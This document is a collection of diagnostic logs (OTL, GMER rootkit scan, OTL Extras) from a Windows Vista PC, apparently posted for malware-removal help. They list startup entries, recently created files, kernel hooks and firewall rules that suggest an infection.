O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Bing Bar Helper) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
O3 - HKLM\..\Toolbar: (no name) - {0BF43445-2F28-4351-9252-17FE6E806AA0} - No CLSID value found.
O3 - HKLM\..\Toolbar: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\Acer\Empowering Technology\eDataSecurity\x86\eDStoolbar.dll (Egis Incorporated.)
O3 - HKLM\..\Toolbar: (Bing Bar) - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
O3 - HKCU\..\Toolbar\ShellBrowser: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - C:\Acer\Empowering Technology\eDataSecurity\x86\eDStoolbar.dll (Egis Incorporated.)
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG)
O4 - HKLM..\Run: [eRecoveryService] File not found
O4 - HKLM..\Run: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation)
O4 - HKLM..\Run: [Malwarebytes' Anti-Malware (reboot)] C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe (Malwarebytes Corporation)
O4 - HKLM..\Run: [NetDrive] C:\Program Files\NetDrive\NetDrive.exe (Bdrive Inc.)
O4 - HKLM..\Run: [SynTPStart] C:\Program Files\Synaptics\SynTP\SynTPStart.exe (Synaptics, Inc.)
O4 - HKCU..\Run: [GameXN GO] C:\ProgramData\GameXN\GameXNGO.exe (EasyBits Software AS)
O4 - HKCU..\Run: [Netdrive] C:\Program Files\NetDrive\netdrive.exe (Bdrive Inc.)
O4 - HKCU..\Run: [pejo] C:\Users\ant\AppData\Roaming\pejo\vifier.bat ()
O4 - Startup: C:\Users\ant\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ownCloud.lnk = C:\Program Files\ownCloud Client\owncloud.exe ()
O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr (Google Inc.)
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_950DF09FAB501E03.dll/cmsidewiki.html File not found
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O13 - gopher Prefix: missing
O15 - HKCU\..Trusted Domains: fritz.box ([]* in Lokales Intranet)
O15 - HKCU\..Trusted Ranges: Range1 ([*] in Lokales Intranet)
O16 - DPF: {34DC6011-88B5-4EA9-BA7A-DC7B4F4437FE} hxxp://photoservice.fujicolor.eu/ips-opdata/objects/jordan.cab (JordanUploader Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.178.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D6A7C132-CD4D-40B0-B557-D15BEBA0128B}: DhcpNameServer = 192.168.178.1
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL File not found
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL File not found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Windows\Web\Wallpaper\img36.jpg
O24 - Desktop BackupWallPaper: C:\Windows\Web\Wallpaper\img36.jpg
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006.09.18 23:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O33 - MountPoints2\{06099c25-89ca-11df-b824-001d722ce5cf}\Shell - "" = AutoRun
O33 - MountPoints2\{06099c25-89ca-11df-b824-001d722ce5cf}\Shell\AutoRun\command - "" = G:\USBAutoRun.exe
O33 - MountPoints2\{73e0bc52-f584-11df-848e-c5c0efcc5a54}\Shell - "" = AutoRun
O33 - MountPoints2\{73e0bc52-f584-11df-848e-c5c0efcc5a54}\Shell\AutoRun\command - "" = F:\Setup.exe
O33 - MountPoints2\{833a5916-e89a-11de-af94-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{833a5916-e89a-11de-af94-806e6f6e6963}\Shell\AutoRun\command - "" = F:\LaunchU3.exe -a
O33 - MountPoints2\{9dbcd877-aaa6-11df-aff4-806e6f6e6963}\Shell\AutoRun\command - "" = F:\Menu.exe
O33 - MountPoints2\{d55ec516-5ea0-11df-a24c-806e6f6e6963}\Shell\AutoRun\command - "" = F:\Menu.exe
O33 - MountPoints2\F\Shell\AutoRun\command - "" = F:\Menu.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
========== Files/Folders - Created Within 30 Days ==========
[2013.06.02 17:02:09 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe
[2013.06.02 17:01:27 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\virus tools
[2013.06.02 14:56:33 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\logs
[2013.05.20 14:57:29 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\Handy Backup
[2013.05.19 21:22:16 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\pejo
[2013.05.15 20:53:08 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\MyPhoneExplorer
[2013.05.15 20:53:04 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PriceGong
[2013.05.15 20:53:03 | 000,000,000 | ---D | C] -- C:\Program Files\PriceGong
[2013.05.15 20:53:03 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyPhoneExplorer
[2013.05.15 20:52:14 | 000,000,000 | ---D | C] -- C:\Program Files\MyPhoneExplorer
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
========== Files - Modified Within 30 Days ==========
[2013.06.02 17:11:17 | 000,001,094 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2013.06.02 17:11:09 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2013.06.02 17:11:09 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2013.06.02 17:10:55 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013.06.02 17:10:49 | 3219,243,008 | -HS- | M] () -- C:\hiberfil.sys
[2013.06.02 17:09:39 | 000,000,020 | ---- | M] () -- C:\Users\ant\defogger_reenable
[2013.06.02 17:07:05 | 000,050,477 | ---- | M] () -- C:\Users\ant\Desktop\Defogger.exe
[2013.06.02 17:06:01 | 000,001,098 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2013.06.02 17:02:10 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe
[2013.06.02 16:58:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2013.06.02 16:49:01 | 000,628,992 | ---- | M] () -- C:\Windows\System32\perfh007.dat
[2013.06.02 16:49:01 | 000,596,246 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2013.06.02 16:49:01 | 000,126,704 | ---- | M] () -- C:\Windows\System32\perfc007.dat
[2013.06.02 16:49:01 | 000,104,320 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2013.05.19 21:30:31 | 000,600,389 | ---- | M] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | M] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | M] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | M] () -- C:\Users\ant\9gghzlvklvp08.exe
[2013.05.19 09:30:23 | 000,001,851 | ---- | M] () -- C:\Users\Public\Desktop\Adobe Reader 9.lnk
[2013.05.18 22:43:51 | 000,411,192 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2013.05.15 20:53:04 | 000,001,818 | ---- | M] () -- C:\Users\Public\Desktop\MyPhoneExplorer.lnk
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
========== Files Created - No Company Name ==========
[2013.06.02 17:09:24 | 000,000,020 | ---- | C] () -- C:\Users\ant\defogger_reenable
[2013.06.02 17:01:36 | 000,050,477 | ---- | C] () -- C:\Users\ant\Desktop\Defogger.exe
[2013.05.19 21:30:31 | 000,600,389 | ---- | C] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | C] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | C] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | C] () -- C:\Users\ant\9gghzlvklvp08.exe
[2013.05.15 20:53:04 | 000,001,818 | ---- | C] () -- C:\Users\Public\Desktop\MyPhoneExplorer.lnk
[2011.11.26 23:51:28 | 000,175,616 | ---- | C] () -- C:\Windows\System32\unrar.dll
[2011.11.26 23:51:26 | 000,650,752 | ---- | C] () -- C:\Windows\System32\xvidcore.dll
[2011.11.26 23:51:26 | 000,243,200 | ---- | C] () -- C:\Windows\System32\xvidvfw.dll
[2011.11.26 23:51:25 | 000,074,752 | ---- | C] () -- C:\Windows\System32\ff_vfw.dll
[2011.06.15 18:08:12 | 000,001,024 | ---- | C] () -- C:\Users\ant\.rnd
[2011.06.06 20:26:34 | 000,000,000 | ---- | C] () -- C:\Users\ant\AppData\Local\{5336EE4C-60E1-417C-926F-ED072C3704C0}
[2010.11.21 17:44:27 | 000,000,173 | -HS- | C] () -- C:\ProgramData\.zreglib
[2010.06.28 14:39:01 | 000,000,680 | ---- | C] () -- C:\Users\ant\AppData\Local\d3d9caps.dat
[2010.03.14 20:06:58 | 000,000,056 | -H-- | C] () -- C:\ProgramData\ezsidmv.dat
[2009.05.18 23:08:39 | 000,249,344 | ---- | C] () -- C:\Users\ant\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
========== ZeroAccess Check ==========
[2006.11.02 14:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012.06.08 19:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.04.11 08:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009.04.11 08:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
========== LOP Check ==========
[2012.09.04 20:37:49 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Cornelsen
[2010.11.21 17:37:15 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\DAEMON Tools Lite
[2009.11.09 14:21:11 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\ESET
[2009.05.19 21:40:19 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\fotobuch.de AG
[2009.11.09 14:20:41 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\FRITZ!
[2013.06.02 16:02:11 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\go
[2013.05.15 20:53:08 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\MyPhoneExplorer
[2012.09.28 23:31:15 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\NetDrive
[2009.05.18 23:02:36 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\OpenOffice.org
[2013.06.02 14:56:57 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\pejo
[2009.08.24 23:59:34 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\schroedelarbeitblaetter
[2010.11.21 17:44:36 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\SlySoft
[2009.11.09 13:44:20 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Thunderbird
[2011.12.09 22:04:13 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Trine2
[2012.12.25 23:04:09 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\TwonkyMedia
[2012.12.25 22:33:06 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\TwonkyServer
========== Purity Check ==========
< End of report >
gmer.txt Code:
GMER 2.1.19163 - hxxp://www.gmer.net
Rootkit scan 2013-06-02 22:26:27
Windows 6.0.6002 Service Pack 2 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD2500BEVS-22UST0 rev.01.01A01 232,89GB
Running: gmer_2.1.19163.exe; Driver: C:\Users\ant\AppData\Local\Temp\kxtdrpow.sys
---- System - GMER 2.1 ----
SSDT 8C930A46 ZwCreateSection
SSDT 8C930A50 ZwRequestWaitReplyPort
SSDT 8C930A4B ZwSetContextThread
SSDT 8C930A55 ZwSetSecurityObject
SSDT 8C930A5A ZwSystemDebugControl
SSDT 8C9309E7 ZwTerminateProcess
---- Kernel code sections - GMER 2.1 ----
.text ntkrnlpa.exe!KeSetEvent + 215 826E9958 4 Bytes [46, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 539 826E9C7C 4 Bytes [50, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 56D 826E9CB0 4 Bytes [4B, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 5D1 826E9D14 4 Bytes [55, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 619 826E9D5C 4 Bytes [5A, 0A, 93, 8C]
.text ...
.text C:\Windows\system32\DRIVERS\atikmdag.sys section is writeable [0x8E408000, 0x1F875A, 0xE8000020]
---- User code sections - GMER 2.1 ----
.text C:\Windows\Explorer.EXE[3140] SHELL32.dll!SHGetFolderPathAndSubDirW + 81C5 7602B37C 4 Bytes [F0, 1F, 00, 10] {POP DS; ADD [EAX], DL}
.text C:\Windows\Explorer.EXE[3140] SHELL32.dll!ShellExecuteExW + 18B7 7605DA14 4 Bytes [40, 1D, 00, 10]
---- Devices - GMER 2.1 ----
AttachedDevice \Driver\kbdclass \Device\KeyboardClass0 Wdf01000.sys
AttachedDevice \Driver\kbdclass \Device\KeyboardClass1 Wdf01000.sys
AttachedDevice \FileSystem\fastfat \Fat fltmgr.sys
---- Registry - GMER 2.1 ----
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0xC2 0x76 0xBB 0x58 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x58 0xB3 0xDD 0x04 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x0A 0x52 0xF8 0x64 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0xC2 0x76 0xBB 0x58 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x58 0xB3 0xDD 0x04 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x0A 0x52 0xF8 0x64 ...
---- Disk sectors - GMER 2.1 ----
Disk \Device\Harddisk0\DR0 unknown MBR code
---- EOF - GMER 2.1 ----
Extras.txt: Code:
OTL Extras logfile created on: 02.06.2013 17:24:00 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ant\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
3,00 Gb Total Physical Memory | 1,99 Gb Available Physical Memory | 66,28% Memory free
6,19 Gb Paging File | 5,21 Gb Available in Paging File | 84,05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111,57 Gb Total Space | 15,15 Gb Free Space | 13,58% Space Free | Partition Type: NTFS
Drive D: | 111,55 Gb Total Space | 35,46 Gb Free Space | 31,79% Space Free | Partition Type: NTFS
Drive G: | 1,86 Gb Total Space | 0,02 Gb Free Space | 1,00% Space Free | Partition Type: FAT
Computer Name: ANT-PC | User Name: ant | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
========== Extra Registry (SafeList) ==========
========== File Associations ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.)
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
========== Shell Spawning ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" ()
Directory [CEWE FOTOSCHAU] -- "C:\Program Files\SCHLECKER\SCHLECKER Foto Digital Service\CEWE FOTOSCHAU.exe" -d "%1"
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()
Directory [SCHLECKER Foto Digital Service] -- "C:\Program Files\SCHLECKER\SCHLECKER Foto Digital Service\SCHLECKER Foto Digital Service.exe" "%1"
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
========== Security Center Settings ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"VistaSp2" = Reg Error: Unknown registry data type -- File not found
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
========== Firewall Settings ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
========== Authorized Applications List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\fotobuch.de AG\Designer 2.0\Designer.exe" = C:\Program Files\fotobuch.de AG\Designer 2.0\Designer.exe:*:Designer.exe
========== Vista Active Open Ports Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{01BAB6FB-2EE8-4338-ADD0-C0CED0CDA14B}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=c:\windows\system32\svchost.exe |
"{02A763CC-D826-4FF2-A962-1E02A0F68C4A}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{04BDF624-7EAE-4065-9209-8BFA933D833B}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{16CE6FD6-ACC3-4E6B-B5F8-465477CF0CA9}" = lport=2869 | protocol=6 | dir=in | app=system |
"{21565775-D419-44F2-BD2F-BE2C95BB9FD3}" = rport=445 | protocol=6 | dir=out | app=system |
"{525B6120-2283-4102-8418-1676D0E8F53A}" = rport=137 | protocol=17 | dir=out | app=system |
"{5D154A06-48C6-4B76-AE70-0C242389F7A6}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe |
"{5D4EEFAB-5D5B-42D4-8004-EEC11C0E38E0}" = lport=427 | protocol=17 | dir=in | name=druckvorgang |
"{6092F5AB-197D-42F3-9576-7269713779C5}" = lport=137 | protocol=17 | dir=in | name=druckvorgang |
"{63F62E60-2FC5-424D-9AE1-C634204CB5DB}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{71F4296E-2DB3-4D6E-8FB9-23ACF99E6072}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{7469BC45-FD5D-4F16-8201-5B67ABFA03EF}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{7D09AC59-3128-489C-B1F0-F90CCBED92AE}" = lport=445 | protocol=6 | dir=in | app=system |
"{7E6B0420-F79A-44FF-8424-6FA970ACC849}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=c:\windows\system32\svchost.exe |
"{8F3EDFD5-44CA-4C46-80F6-42BD7EDEA80D}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{903D317E-BC5C-42C6-A3CA-5A837F68D22B}" = rport=138 | protocol=17 | dir=out | app=system |
"{9D62E869-2D8D-4B0C-B1E6-19666E027646}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{B4E6989F-428F-4223-884F-1724940DA61A}" = rport=139 | protocol=6 | dir=out | app=system |
"{C5E4B5F0-2565-47F0-BA30-E5D0A2C3F945}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{D13746C7-7958-4013-AECA-98927F72D0E3}" = lport=9100 | protocol=6 | dir=in | name=druckvorgang |
"{DDE5D42A-1EEF-4E00-92D0-47D0E51AB330}" = lport=137 | protocol=17 | dir=in | app=system |
